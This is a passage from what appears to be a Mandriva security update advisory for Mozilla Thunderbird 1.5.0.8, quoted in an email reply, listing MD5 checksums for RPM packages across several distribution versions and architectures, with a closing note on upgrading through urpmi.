>2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3ca6736aaf725851a0be21f0490aeb20  
>2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
>  47b16b8c45acc936b62051594ed87c69  
>2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
>  c2e742162882c52761040025ff4ddfff  
>2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
>  072c5224bd49a45ba7ab0a57f657ec6e  
>2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
>  3393e810730d305adc4fe8ecc98b782a  
>2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
>  70882501b0fc01a56cee67c2b7c63ac5  
>2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Mandriva Linux 2007.0/X86_64:
>  47aa8c7af46ee44f1b51e0f44772beeb  
>2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e284b46733e04ab96cccb612de04e5a8  
>2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e73efd093c48aa82d6f73025f1ade443  
>2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ed790bdd1a45343b427925765f5f2b5c  
>2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  61690a97ef04b6083693ffe4a9ab3176  
>2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  889574eda89385739aad6eda7f3d2604  
>2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ef9b59cdd619da74737b5e91e4067386  
>2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e20a88ece32f8ee81aaedd828558d880  
>2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  250f6f86984922da278774d480ba37a7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f683dba38c9055cbac36f8468e357ebf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6594d0bb3f7770f168728827c1cf9f83  
>2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1ee011c3c94c7b081f53b9a55996da0c  
>2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be24dd32e628b8294c1b87d200cf02dd  
>2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  020acf8e510080a701c6278c6eb862ae  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  af4c92e4f3eaf833111572ead14c8c04  
>2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7483c3a55198fcbc9be2c9750919a370  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  753acdb58e6400659dab48ff78f371e7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  fb83f542bd12edda5e85d9873a08a938  
>2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  996bbfb13654cfc2180036ea6b1e61df  
>2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  ff6217b99ab96a1444b6a758bf184ecf  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  f15d9f053011068deba71fdc05dc6d46  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  98f63b0dedef781ec16f8bebb6a032cb  
>2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e5e42bb849d26a4f59fb6204d6ed9850  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8bc9d56d4778baf40b115eb805a506b3  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  21c7d7ffd14a724e4ce9d96e99d0f3c7  
>2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9b115831c8ae36d7141c93a9d867d445  
>2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  d6efb3cdaba13c17dd31147011796614  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4239765036a0bffaa4fcff9fb076a221  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be87cc456600cb0dc18730ae3f75af92  
>2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  459367e42865a1de4374d2a9b8c36232  
>2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e1b30720806b2c6ab650251f9756127  
>2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  70c5525bea63d291374706abfb4523c4  
>2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  4addf81f6fdb0fe55d2274ba726d066e  
>2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9c9a1e6a7623a712f40666e77fd3f2b4  
>2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  9cd9d0509bbe4d0bc7c092118253c237  
>2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  b23236fc11caa38b1354893f1e9863e1  
>2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c5b898d7f04c26a34bb4223ee4547586  
>2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8e114fec014131d472790035a1509783  
>2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  3eda3b36a83c550a1f52faf6adfb0b10  
>2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  c336cc525567465d1649ee55c604d3a3  
>2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  476f974ea2e3b9ef971231b8b08e62f0  
>2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7878332de8134b9025b924315d6ffbf6  
>2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  7602f9099c26d60e934f54918dd38e46  
>2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  52ba4b91175db4376fd4c4e9018969c3  
>2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  1e2bc31ee83c5c47f06953aba976a27d  
>2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  47b180beb65802e89f7e6a8be7f33d15  
>2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6485a71b5d07fef3e337630aa53bb4c6  
>2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  6b5df9cad533fc75fc47191df5f3dabf  
>2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99b61d660a72eff639f78ec0422aeaf2  
>2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  99cfe247978fe85b5b5186bf12247f3a  
>2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8c393629997cea717c2f1e8d077a9344  
>2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  be518e4b4833e6cb9d083871101be35b  
>2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  8dedff0ffd0e7b7721b256f01821f188  
>2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  05202d61506a60981fb9a317ce6a5d5d  
>2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0deda88ec857fb0c11b57555814a20ec  
>2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  0f2f7928b2edfbe0ae5faf127b0ed066  
>2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm
>  e408368ca02e7efbbece9adbaaea7d56  
>2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
>  7867a124b85e4a8098ec7b814267c1f5  
>2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>  e776e0c4c5a6ff592af0c346bf8b4511  
>2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
>
>  Corporate 3.0:
>  71192ef0a8bd28533718191d287d8158  
>corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
>  c0121a4a0192d7944b1f8d30c977ab38  
>corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
>  53c403f48cb8547f0eb646ab1b41b656  
>corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  032ebcc12942292620b05929e0583f3a  
>corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  c88d6e26aa75dab433abcf71f2962e5c  
>corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
>  dcc54cb45829470f4267806696b46eca  
>corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  e7ba899422d7cbfd343659b810e4ee52  
>corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
>  d987b44bd201c2a23b404751e13df538  
>corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  9d496fa524a5226676f56ed87d2015ec  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
>  eac64993c47963ede70eca5fb62e30b9  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
>  b5523fcbf2370d1805e1f917faaa31c8  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
>  1eb806fe5a429b52f010e16aeed4cb4a  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8da00f3e4033ec813df4548072ac9f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a2434c868a3b5799cb69c31d43f900c  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  a1bb48121d53f83bf0efd303ea477b71  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  6f9d308c194ae42cfa0787afdebff2cc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  bb3c3cf4056814131f8031471c81ac6f  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  4228aaf098c501a80af97469393482b5  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a95ad54416e2f002d1aaa32557cf947  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  19e1eac0351d89760ee31b4c9ee4fcc4  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1c21de0415bd0223237aa82795cc9600  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  a11487e4145c294a57a77491f6996748  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  31064002ac59d4857c3c45c3161580dc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  fc88eeba422b084ffa67b77211248ef0  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
>  4ead83e3405e7469370b4f02a9254ddc  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  3a15b707a6d7f8e9b25c1ccaea023333  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a8c565fd3b42069b2e42103d98dfab2  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  0040d479d7e55304c06df39b2233d12e  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  6fab1321b377748e22a6709b772d5159  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  1969ec5d6cc27df2f09f9733b5b37c6d  
>corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  0c34a8e8bd3f9011283fe990771a857a  
>corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
>  68781ca20e2232457046bdab86b59462  
>corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
>  37c3909b8feb9a35208519ccf4ec8a46  
>corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea2febd0e93d9348fd580452f7adc0be  
>corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
>  2eac2aaeb4fe209f98aa85505f6a9b87  
>corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
>  d8d8fc30075f0848859cbe96b26404a7  
>corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
>  3af19a8b01fb316451132e6460c7deb0  
>corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7aed893e50dff94f47d658d70093824  
>corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
>  ab6ead860edf6de4935aa3bb4ecf4721  
>corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
>  a9b0bc2b2bcf186b5a284cba3d6cad19  
>corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
>  373554b2032c20a61c48f4a4e11e5b57  
>corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
>  1a2efc51627d9f55929e1b33e20f5274  
>corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
>  27ab1d70b317c477b56df8223a8477b4  
>corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
>  0bcd50b34bec84016747f4919b43b8e1  
>corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
>  4b26e1653ccf78604c16b25ed7357dfb  
>corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
>  ea1a0d0349f9a2f26b23c7678d7e5736  
>corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
>  7d7c13e7a820c069b3c657adf57443d9  
>corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
>  ef0755e523de702c802890f494ee5ea0  
>corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f7618d53bff6c0764297f2352c5d0239  
>corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
>  8df8db645153b5f7539044d5f892ad54  
>corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
>  d26cb2fbb5301bcf127ea4e4606f52b9  
>corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
>  f57d3dd11471a798542b87f0a3c68e82  
>corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
>  f3aede5440aeb78b59350fe56bb221d2  
>corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
>  bda7588d80565c17190fb407bdc3b1b2  
>corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
>  5f0764d5685d0836bd718fdc86b8a73a  
>corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
>  2a1892c7e027dba761df43c98bb5e85f  
>corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>
>  Corporate 3.0/X86_64:
>  c109965ada094232d0958a8121be977a  
>corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e50d4054e85e4624b285067c75cfab18  
>corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f8cc5e4a36961ef4db2b8632fc6734d9  
>corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  70e0a1878ce810ee835e7eca08a11e12  
>corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  50abb11664ca02e6d77cbf30396e5398  
>corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5565876286c51872fb0ff90df059f052  
>corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cdd3892a5ba2a7c1ffe29d009e9d23a9  
>corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ba3e7a92e79e00cd74b722ab94d832eb  
>corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c11927081645df376c72f27e8ebc6a85  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  448172b7c753b48c81b2a2c5d337b9e5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b83c0eb2158672f087fd5754ca27efad  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  49b91f3eae7a0773ecce62f635a6dfe9  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3a0cf5325721e29c4eba9ee7cbc7efb7  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  cadf1aff1e915adb9e14539eb04521db  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8218118b837bf05b3603652f0d4c5690  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7c7190fc9ec1fc5774436ec7b0c92fd5  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a42f63c64470ba933d6239bdf8b1569c  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  af8c5d7e3569278f3e9d364362be25b3  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  c749a5b7ac03ad98919f83425fcbd4c2  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ac82cd1f4fc0c5ed57be5b165cc65be4  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0fbd67977bdfc1b1f9aa3c846c80c244  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4d26f0c7b32d3888e1e5c4c14516a4df  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  37fbc8358f1f11d5cb9f0e9b2fab3b26  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6bec775a601e84be547246ae5638d059  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  0dc1c40ef6d1a233661048447db25543  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  7ec948cc8df84aae6b3d660bd4187208  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4b7ba48ffeff51709b26c8f315a4aaa1  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  94fceae9b7bc6d48fe2677eecaaf11a6  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d578499c38c981f2b8cc55fc1351efef  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  095291274be4a418d05c4e96cb441d90  
>corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  272b554e86966e103d3e7f42b5cba9db  
>corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  52bd52c4d5eaad6fa541dd20db5411d0  
>corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  2536b28aa209a912ff74601db4e685b4  
>corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  484ad35799b9a8cd277754bf1b13d686  
>corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  42ff5a3a8320c4be3ffb1f1d74912f78  
>corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  8a46a1d9f9380c205699ce090d749ff2  
>corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  3c30c5aeee783bfabe34fb1ff7357d38  
>corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  a90b14f77d6eed2228bfa55457803f6f  
>corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  719239492f7d93b04f2c95902fccf94c  
>corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  f52bcdf19f10745e756f0d58616126df  
>corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  79826e403152cbe90ddf3bd4d8d64abe  
>corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  18c08993c8f43c976be6cf2e8cfb2c35  
>corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  b17866029fe4244a77af59fbb55a07b9  
>corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  878f59fdb3ebb5929fc23437a17fb5ad  
>corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d62fb25dc173e8b12be8623ae8fbf9bf  
>corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  266322718c7cedd78e89524940f15d55  
>corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  32c5fcab859aff66aaf704b997a1c625  
>corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  17d7eeb0fbd25df1f76d5fa875ef7a3d  
>corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  4aabd47a35cb15547ccbe4eda1b521e8  
>corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  1d8d27be2902605b0eae9dcbd89654cc  
>corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  6c116048a69b3c176831fde5ff0a252a  
>corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  e5bcb8518c5a61e63e62f90c363c67ae  
>corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  5569afdd940d28bdf37a1003d5d5d6b0  
>corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  d00245da432be7a7d268846891555930  
>corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  ee130a70f9b1fe5719fea63963f3db6d  
>corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  81f41bebeb9eca34d7c27ab81ca41af6  
>corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm
>  04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  
>corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
>  98c5a4c000178cf57677fa6ee70adb71  
>corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  124ecce0dd9a26b565eef6c2f7e14401  
>corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
>  _______________________________________________________________________
>
>  To upgrade automatically use MandrivaUpdate or urpmi.  The verification
>  of md5 checksums and GPG signatures is performed automatically for you.
>
